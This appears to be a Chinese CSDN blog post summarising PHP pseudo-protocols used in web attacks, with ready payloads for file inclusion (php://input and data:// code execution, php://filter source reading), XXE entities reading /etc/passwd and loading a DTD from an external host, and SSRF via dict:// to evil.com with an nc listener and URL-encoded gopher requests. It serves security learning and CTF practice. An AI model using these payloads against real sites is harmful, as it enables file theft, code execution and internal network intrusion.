伪协议总结

已于 2022-04-24 16:38:38 修改
阅读量2k 收藏 10
点赞数 1
文章标签: web安全
于 2022-04-24 16:09:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62805300/article/details/124383559
版权

php

file://:访问本地文件系统。

http://localhost/test.php?file=file://C:\Windows\System32\drivers\etc\hosts

php://访问各个输入输出流

php://input:将POST输入流当做PHP代码执行。

http://localhost/test.php?file=php://input    
POST:<?php phpinfo();

php://filter: 一种元封装器, 设计用于数据流打开时的筛选过滤应用。

php://filter/read=convert.base64-encode/resource=index.php

zip://

zip://绝对路径\需要解压缩的文件%23子文件名

phar://

类似zip,与zip协议不同的是zip协议为绝对路径,而phar协议为相对路径。

data://

data://text/plain,<?php phpinfo();?>

后面的值会被当做php代码执行。

也可如此

data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

XXE 

主要是在引用外部实体的时候用到伪协议

expext://

执行命令

 

 http

可以直接访问网络中主机的资源

<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY % d SYSTEM "http://xxx.xxx.xxx.xxx/xxe.dtd">
%d;
]>
<note>
    <name>&b;</name>
</note>

file 

xxe同样也可以使用file协议访问主机上的文件

<?xml version="1.0"?>
<!DOCTYPE note [
    <!ENTITY content SYSTEM "file:///etc/passwd">
]>
<note>
    <name>&content;</name>
</note>

php:// 

XML文档中也可以利用php伪协议读取任意文件

<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/issue">
<!ENTITY % dtd SYSTEM "http://xxx.xxx.xxx.xxx/xxe.dtd"
%dtd;
%file;
]>

SSRF

file:// 

类似上面两种

dict://

能够引用允许通过DICT协议使用的定义或单词列表:

http://example.com/ssrf.php?dict://evil.com:1337/ 
evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337[tcp/*] 
accepted (family 2, sport 31126)CLIENT libcurl 7.40.0

 tftp://

TFTP(Trivial File Transfer Protocol,简单文件传输协议)是一种简单的基于lockstep机制的文件传输协议,它允许客户端从远程主机获取文件或将文件上传至程主机。

gopher://

Gopher是一种分布式文档传递服务。利用该服务,用户可以无缝地浏览、搜索和检索驻留在不同位置的信息。

gopher协议的格式:gopher://IP:port/_TCP/IP数据流 

margine:~ margin$ curl gopher://192.168.0.119:2333/_abcd

需要在使用gopher协议时在url后加入一个字符(该字符可随意写) 

在gopher协议中发送HTTP的数据,需要以下三步:

1、构造HTTP数据包
2、URL编码、替换回车换行为%0d%0a
3、发送gopher协议 

 在转换为URL编码时候有这么几个坑

1、问号(?)需要转码为URL编码,也就是%3f
2、回车换行要变为%0d%0a,但如果直接用工具转,可能只会有%0a
3、在HTTP包的最后要加%0d%0a,代表消息结束(具体可研究HTTP包结束)

 Gopher发送请求HTTP GET请求:

GET /ssrf/base/get.php?name=Margin HTTP/1.1
Host: 192.168.0.109
curl gopher://192.168.0.109:80/_GET%20/ssrf/base/get.php%3fname=Margin%20HTTP/1.1%0d%0AHost:%20192.168.0.109%0d%0A

 
https://zhuanlan.zhihu.com/p/112055947

https://blog.csdn.net/weixin_30883271/article/details/98323279?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-1.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-1.pc_relevant_default&utm_relevant_index=2

https://security.tencent.com/index.php/blog/msg/69

R0ck3t
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全之PHP的伪协议漏洞利用,以及伪协议漏洞防护方法_php伪协议是漏洞吗
m0_60732644的博客
04-08 587
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
PHP伪协议精讲(文件包含漏洞)
2301_76251460的博客
07-21 736
PHP伪协议
[php知识点]PHP伪协议
Landasika的博客
05-17 8117
目录 一、前言1、什么是PHP伪协议2、什么时候用PHP伪协议include和require函数include和include_once的区别(require与require_once的区别)highlight_file()和show_source()readfile和file_get_contents和filefile_put_contentsfopen二、PHP伪协议file://...
PHP伪协议
qq_62604985的博客
07-10 1152
php伪协议,就是php支持的协议和封装协议file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流但是需要注意的是,当使用网络路径进行访问时,需要allow_url_fopen和allow_url_include都为ON。
【每天学习一点新知识】文件包含常用之伪协议
RexHa的博客
02-06 3616
一些比较常用的php伪协议用法及部分演示过程
PHP 伪协议总结.docx
02-24
PHP 伪协议总结.docx
云台控制协议.ppt
06-30
改文档主要针对工作当中的问题,总结了各个协议的流程,和各个协议的使用字节所对应的关系,并使用伪代码来抽象了各个协议
下一代Internet技术与协议--知识点总结1
08-03
伪头标校验则增强了数据包的安全性。 ICMP(Internet Control Message Protocol)协议用于网络诊断和错误报告,如ping和traceroute命令就依赖于ICMP。ICMPv4和ICMPv6都包含多种类型的报文,如差错报告、控制报文和...
APUE归纳总结
09-27
《APUE归纳总结》 APUE,全称Advanced Programming in the UNIX Environment,是一本深入讲解UNIX/Linux系统编程的经典书籍。本文将围绕APUE中的关键知识点进行归纳和详细解释。 1. /etc/passwd文件:该文件包含了...
CTF比赛中zip的总结1
08-03
前言在CTF比赛的MISC和CRYPTO中,经常要和zip压缩包打交道,这里做一个zip方面的总结。本文中用到的所有文件和工具都可在这个网盘中找到http://
gopher伪协议
2202_75361164的博客
03-27 593
而file_get_contents()造成的SSRF,gopher协议就不用进行二次URLEncode。curl_exec()造成的SSRF,gopher协议需要使用二次URLEncode;注意不要使用+当做空格,就页面里面用%20,bp或hackbar用%2520。(img-kwRcQIhN-1711552424782)]因为是使用into outfile函数写入的,有一下限制。需要注意的是,post请求有4个参数为必要参数。[[mysql-文件读写#当我们不得不添加别的参数。
Web安全之PHP的伪协议漏洞利用,以及伪协议漏洞防护方法
Scalzdp的专栏
11-13 2006
单纯看伪协议利用与之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用了伪协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
Day57:WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
最新发布
qq_61553520的博客
03-30 1596
小迪安全-Day57:WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
PHP伪协议详解
m0_67401228的博客
08-02 1387
phpexit();亦或者phpexit();?这样即使插入了一句话木马,在被使用的时候也无法被执行。这样的死亡exit通常存在于缓存、配置文件等等不允许用户直接访问的文件当中。
php get请求_ctf中关于php伪协议的考查
weixin_39928003的博客
11-30 492
原创:Archerx 合天智汇1php://input协议第一个例子flag.php<?php$flag = 'flag{flag_is_here}'; test1.php<?phpinclude('flag.php');$a= $_GET["a"];if(isset($a)&&(file_get_contents($a,'r'))=== 'this is tes...
php为协议 ctf,CTF中常用的php伪协议总结
weixin_42533910的博客
04-02 597
php:// — 访问各个输入/输出流(I/O streams)file:// — 访问本地文件系统phar:// — PHP 归档zlib:// — 压缩流data:// — 数据(RFC 2397)http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsglob:// — 查找匹配的文件路径模式ssh2:// — Secure Shell 2rar:// —...
SSRF最全总结(协议,绕过)
热门推荐
weixin_50464560的博客
01-13 1万+
https://www.anquanke.com/post/id/262430#h3-46   SSRF-Labs配置 有些初学者喜欢用这个靶场,讲下怎么搭建 我用的是Ubuntu18;docker和docker-compose配置可以参考vulhub官网的配置;下面是谷歌搜的 $ curl -sSL https://get.docker.com/ | sh #脚本安装docker $ apt install docker-compose #安装docker compose Basic关和
ssrf中gopher协议的利用
V
10-29 5594
SSRF漏洞如何产生 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击 者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是 能够直接对目标网站的内部系统发起请求。(因为他是从内部系统访 问的,所以可以通过它攻击外网无法访问的内部系统,也就是把目标 网站当中间人) gopher协议的利用 gopher 协议 Gopher是Internet...
文件包含\\&LFI\\&RFI\\&伪协议编码算法\\&代码审计
09-02
总结起来,文件包含漏洞和远程文件包含漏洞是一种常见的安全漏洞,可以通过伪协议编码算法来绕过安全限制。代码审计是一种评估应用程序源代码的方法,可以帮助发现和修复这些漏洞。<span class="em">1</span><span ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值